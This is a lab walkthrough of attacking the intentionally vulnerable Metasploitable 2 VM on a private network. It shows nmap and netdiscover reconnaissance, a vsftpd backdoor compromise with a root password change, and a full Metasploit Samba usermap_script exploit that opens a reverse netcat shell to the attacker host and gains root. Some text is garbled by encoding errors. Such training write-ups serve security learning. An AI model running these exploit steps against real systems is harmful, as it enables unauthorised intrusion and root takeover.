3.3.Metasploitable2
Stage 1: Discovery of live devices on the network (Active Hosts Discovery) :
Used: netdiscover :
โโโ(asใฟAAS)-[~/Labs/Metasploitable-2]
โโ$ sudo netdiscover -r 192.168.84.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.84.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.84.2 00:50:56:e2:e0:18 1 60 VMware, Inc.
192.168.84.133 00:0c:29:2b:f8:0e 1 60 VMware, Inc.
192.168.84.254 00:50:56:f9:b5:05 1 60 VMware, Inc.
Scan the entire network to identify live devices (Ping Sweep) :
-
-sn: Scan without port detection (Ping Scan only) 192.168.84.0/24 : Scan the entire Class C network (256 IP addresses)
-
5 live devices confirmed :
```plaintext
192.168.84.1
192.168.84.2
192.168.84.133 => Target Machine
192.168.84.254
192.168.84.131 => My IP (Attack Machine) ```
- Device
192.168.84.133appears in both netdiscover and nmap, which makes it likely the target device.
Scan for open services and ports on the target :
1 - Using Nmap to Detect Firewall
- TCP ACK Scan :
-sA: Checks the ACK type to see if the firewall allows or blocks responses.
-
If Result:
-
If filtered appears, there is most likely a firewall.
-
If unfiltered appears, there is most likely no clear filtering.
-
-
The target device responds to ACK packets with a Reset (RST) response.
-
This indicates that the ports are not protected by a firewall that silences or filters packets.
-
A RST response means that the packets are passing through normally.
โ Conclusion:
- There is no active firewall blocking ACK scanning on this device (192.168.84.131). The ports are handling packets normally, indicating a device open to network scanning without strong security.
Since the device is responding to the ACK check, you can now use:
โโโ(asใฟAAS)-[~/Labs/Metasploitable-2]
โโ$ nmap -p- -sV -T5 -O 192.168.84.133 | tee Metasploitable2.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 12:17 EDT
Nmap scan report for 192.168.84.133
Host is up (0.0021s latency).
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42491/tcp open java-rmi GNU Classpath grmiregistry
54231/tcp open status 1 (RPC #100024)
55027/tcp open nlockmgr 1-4 (RPC #100021)
60675/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:2B:F8:0E (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.43 seconds
๐ Command Explanation:
| cucumber | Meaning |
|---|---|
-p- |
Scan all ports (1 to 65535) |
-sV |
Trying to discover the version of each service running on the open port |
-T5 |
Aggressive Timing โ used in test environments |
-O |
OS Detection |
tee Metasploitable2.txt |
To save the results to a file at the same time they appear in the terminal |
Let's take each open port and work step by step to analyze each port and see if there is a loophole that we can exploit or not ":
-
First Port 21 FTP => (vsftpd 2.3.4)
21/tcp open ftp vsftpd 2.3.4
- Search in exploit-db.com :
-
vsftpd 2.3.4 - Backdoor Command Execution .
-
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
Exploiting the vulnerability using Metasploit :
- open Metasploit :
plaintext
โโโ(asใฟAAS)-[~/Labs/Metasploitable-2]
โโ$ msfconsole
We will use Backdoor Command Execution :
Setting options
Implementation of exploitation :
Change the root password :
Try logging in machine using root username and password :
username : root
pass : AS-2
Done โ))
-
secondly netbios-ssn Port 139 And 445 Samba => (smbd 3.X - 4.X) :
Exploiting a Samba 3.0.20 vulnerability to obtain a root shell via SMB on ports 139/445 :
1- Check the system and determine the Samba version :
โโโ(asใฟAAS)-[~/Labs/Metasploitable-2]
โโ$ nmap -p 139,445 --script smb-os-discovery 192.168.84.133
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 17:38 EDT
Nmap scan report for 192.168.84.133
Host is up (0.0028s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:2B:F8:0E (VMware)
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2025-07-16T13:50:23-04:00
Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
Result: OS: Unix (Samba 3.0.20-Debian) Computer name: metasploitable
2- Search for appropriate vulnerabilities for the Samba version :
โโโ(asใฟAAS)-[~/Labs/Metasploitable-2]
โโ$ searchsploit Samba 3.0.20-Debian
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The important thing here: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
3- Search for exploits within Metasploit :
- open :
msfconsole
โโโ(asใฟAAS)-[~/Labs/Metasploitable-2]
โโ$ msfconsole
- search :
search type:exploit Samba 3.0.20
```plaintext msf6 > search type:exploit Samba 3.0.20
Matching Modules ================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 > ```
- Then =>
use 0Then =>show options
```plaintext
msf6 > use 0 [*] No payload configured, defaulting to cmd/unix/reverse_netcat msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.84.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/samba/usermap_script) > ```
4- Setting options within the exploit :
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.84.133
RHOSTS => 192.168.84.133
msf6 exploit(multi/samba/usermap_script) > set LHOST 192.168.84.131
LHOST => 192.168.84.131
msf6 exploit(multi/samba/usermap_script) > exploit
-
โ LHOST is the Kali Linux address
-
โ RHOSTS is the Metasploitable 2 address
-
โ RPORT is automatically set to 139
5 - Implementing the exploitation :
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.84.131:4444
[*] Command shell session 1 opened (192.168.84.131:4444 -> 192.168.84.133:59445) at 2025-07-16 18:03:58 -0400
id
uid=0(root) gid=0(root)
whoami
root
Quick Technical Summary: CVE: CVE-2007-2447 :
-
Service: Samba SMB (netbios-ssn) -
Ports: 139 and 445 -
Exploit Type: Remote Command Execution -
Module: exploit/multi/samba/usermap_script -
Result: Full shell as root
๐ฌ "Control the code, and you control the world." ๐ From wiping metadata to gaining root access โ every step is documented and my goal is to deeply understand the system, not just hack!
See You Soon
AS Cyber โ)).